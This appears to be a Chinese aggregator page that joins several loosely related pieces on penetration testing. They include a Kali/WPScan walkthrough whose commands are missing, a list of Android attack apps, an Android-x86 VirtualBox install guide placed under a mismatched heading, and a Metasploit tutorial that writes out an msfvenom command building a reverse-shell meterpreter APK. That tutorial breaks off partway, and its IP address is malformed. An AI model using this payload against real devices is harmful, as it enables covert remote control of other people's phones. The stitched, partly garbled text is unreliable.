本文目录一览:
- 1、使用 Linux 安全工具进行渗透测试
- 2、怎么用kili linux渗透安卓设备
- 3、哪款linux系统是用来渗透的
- 4、如何在安卓手机上安装Linux系统 – WEB骇客
- 5、安卓渗透是什么意思,网上看到好多安卓渗透软件,干什么用的?
- 6、如何使用Metasploit对安卓手机进行控制
使用 Linux 安全工具进行渗透测试
众多被广泛报道的大型消费企业入侵事件凸显了系统安全管理的重要性。幸运的是,有许多不同的应用程序可以帮助保护计算机系统。其中一个是 Kali,一个为安全和渗透测试而开发的 Linux 发行版。本文演示了如何使用 Kali Linux 来审视你的系统以发现弱点。
Kali 安装了很多工具,它们都是开源的,默认情况下安装了它们会让事情变得更容易。
(LCTT 译注:Kali 及其携带工具只应该用于对自己拥有合法审查权利的系统和设备,任何未经授权的扫描、渗透和攻击均是违法的。本文作者、译者均不承担任何非授权使用的结果。)
本文使用的系统是:
我在上面列出了硬件规格,因为一些任务要求很高,尤其是在运行 WordPress 安全扫描程序(WPScan)时对目标系统 CPU 的要求。
首先,我会在目标系统上进行基本的 Nmap 扫描(你可以阅读 使用 Nmap 结果帮助加固 Linux 系统一文来更深入地了解 Nmap)。Nmap 扫描是一种快速的方法,可以大致了解被测系统中哪些端口和服务是暴露的。
默认扫描显示有几个你可能感兴趣的开放端口。实际上,任何开放端口都可能成为攻击者破坏你网络的一种方式。在本例中,端口 21、22、80 和 443 是不错的扫描对象,因为它们是常用服务的端口。在这个早期阶段,我只是在做侦察工作,尽可能多地获取有关目标系统的信息。
我想用 Nmap 侦察 80 端口,所以我使用 -p 80 参数来查看端口 80, -A 参数来获取操作系统和应用程序版本等信息。
关键信息有:
现在我知道了这是一个 WordPress 服务器,我可以使用 WPScan 来获取有关潜在威胁的信息。一个很好的侦察方法是尝试找到一些用户名,使用 --enumerate u 告诉 WPScan 在 WordPress 实例中查找用户名。例如:
这显示有两个用户: admin 和 pgervase 。我将尝试使用密码字典来猜测 admin 的密码。密码字典是一个包含很多密码的文本文件。我使用的字典大小有 37G,有 3,543,076,137 行。
就像你可以选择不同的文本编辑器、Web 浏览器和其他应用程序 一样,也有很多工具可以启动密码攻击。下面是两个使用 Nmap 和 WPScan 的示例命令:
这个 Nmap 脚本是我使用的许多脚本之一,使用 WPScan 扫描 URL 只是这个工具可以完成的许多任务之一。你可以用你喜欢的那一个。
WPScan 示例在文件末尾显示了密码:
在末尾的“找到有效组合”部分包含了管理员用户名和密码,3231 行只用了两分钟。
我还有另一个字典文件,其中包含 3,238,659,984 行,使用它花费的时间更长并且会留下更多的证据。
使用 Nmap 可以更快地产生结果:
然而,运行这样的扫描可能会在目标系统上留下大量的 HTTPD 日志消息:
为了获得关于在最初的 Nmap 扫描中发现的 HTTPS 服务器的信息,我使用了 sslscan 命令:
它显示了有关启用的 SSL 协议的信息,在最下方,是关于 Heartbleed 漏洞的信息:
有很多方法可以保护你的系统免受大量攻击。几个关键点是:
本文对安全工具及其使用方法的介绍只是冰山一角。深入了解的话,你可能需要查看以下资源:
via:
作者:Peter Gervase选题:lujun9972译者:MjSeven校对:wxy
怎么用kili linux渗透安卓设备
Metasploit渗透测试指南 这本书不光是讲Metasploit的,还讲很多别的工具,比较全,不错,还有实际的例子
哪款linux系统是用来渗透的
Kali Linux这款系统是用来渗透的 ,它上面的渗透工具非常齐全,大致分为Web渗透(针对网站)、无线渗透(比如渗透WIFI获得密码)、主机渗透(就是根据主机漏洞进行渗透,主要用nessus和Metasploit),还可以进行密码破解,一般都是字典爆破(破passwd哈希、MD5、rar密码、各种口令),还有社工工具(比较著名的是SET),还有渗透过程中的信息收集方面的工具也很多。
如何在安卓手机上安装Linux系统 – WEB骇客
Android (x86)项目致力于移植Android系统到X86处理器上,使用户可以更容易的在任何电脑上安装Android。他们通过使用android源码,增加补丁来使Android能够在X86处理器,笔记本电脑和平板电脑下工作。 前一段时间,项目组发布了最新的“Android KitKat 4项目下载Android 4.4 x86 Kit Kat文件(地址) 3、要想安装Android 4.4 kitkat,首先,你需要启动刚刚下载.iso文件,打开VirtualBox,创建一个新的虚拟机,然后按照下面图片设置:4、接下来,它会询问你新设备的内存大小,Android 4.4 kikat需要1G内存才能完美运行,但是由于我的电脑只有1G内存,我只能选择512MB。5、选择“现在创建虚拟硬盘”(“Create a virtual hard drive now”)来创建一个新的硬盘。6、它现在会询问你新虚拟硬盘的类型,选择VDI7、现在设置虚拟硬盘大小,你可以按照你的所需来设置任何大小,但是除了将来安装Apps所用的空间,至少需要4G来保证系统正确安装。8、现在你的新虚拟设备创建好了,可以启动下载的.iso文件了,从左边的列表选择创建的虚拟机,点击设置-存储,如下图,选择android 4.4 kitkat RC2的镜像文件。9、点击OK,打开机器,启动.iso镜像,选择“安装”开始在虚拟机上安装系统。10、请选择一个分区来安装Android-x8611、如下图,你可以看见cfdisk界面,cfdisk是一个分区工具,我们将要使用它来创建一个新的硬盘分区,用来安装Android 4.4,现在,点击“New”12、选择“Primary”作为分区类型
安卓渗透是什么意思,网上看到好多安卓渗透软件,干什么用的?
先把这个词分为两部分来解读:1.Android是一种基于Linux的自由及开放源代码的操作系统,主要使用于移动设备,如智能手机和平板电脑,由Google公司和开放手机联盟领导及开发。尚未有统一中文名称,中国大陆地区较多人使用“安卓”或“安致”。Android操作系统最初由Andy Rubin开发,主要支持手机。2005年8月由Google收购注资。2007年11月,Google与84家硬件制造商、软件开发商及电信营运商组建开放手机联盟共同研发改良Android系统。随后Google以Apache开源许可证的授权方式,发布了Android的源代码。第一部Android智能手机发布于2008年10月。Android逐渐扩展到平板电脑及其他领域上,如电视、数码相机、游戏机等。2011年第一季度,Android在全球的市场份额首次超过塞班系统,跃居全球第一。 2013年的第四季度,Android平台手机的全球市场份额已经达到78.1%。[1] 2013年09月24日谷歌开发的操作系统Android在迎来了5岁生日,全世界采用这款系统的设备数量已经达到10亿台。2.渗透,这里的渗透指的是渗透测试,而渗透测试是为了证明网络防御按照预期计划正常运行而提供的一种机制。不妨假设,你的公司定期更新安全策略和程序,时时给系统打补丁,并采用了漏洞扫描器等工具,以确保所有补丁都已打上。如果你早已做到了这些,为什么还要请外方进行审查或渗透测试呢?因为,渗透测试能够独立地检查你的网络策略,换句话说,就是给你的系统安了一双眼睛。而且,进行这类测试的,都是寻找网络系统安全漏洞的专业人士。
结合起来来说就是“
安卓平台的相关漏洞挖掘和测试,
端口扫描
漏洞发现
对路由器扫描
伪造数据包
会话控制(需要MSF RPC 连接)
中间人攻击
密码破解
有能力可以攻占路由器
常用软件:dsploit,Network Spoofer,zANTI,DroidSheep
上图为zanti软件运行截图。
相关书籍:
Android恶意代码分析与渗透测试
Android系统安全...等
如何使用Metasploit对安卓手机进行控制
文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。
在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。
创建负载
我们需要两台虚拟机:Kali Linux和安卓模拟器。
打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk
```
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机
LPORT 设置用来接收反弹连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。
我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。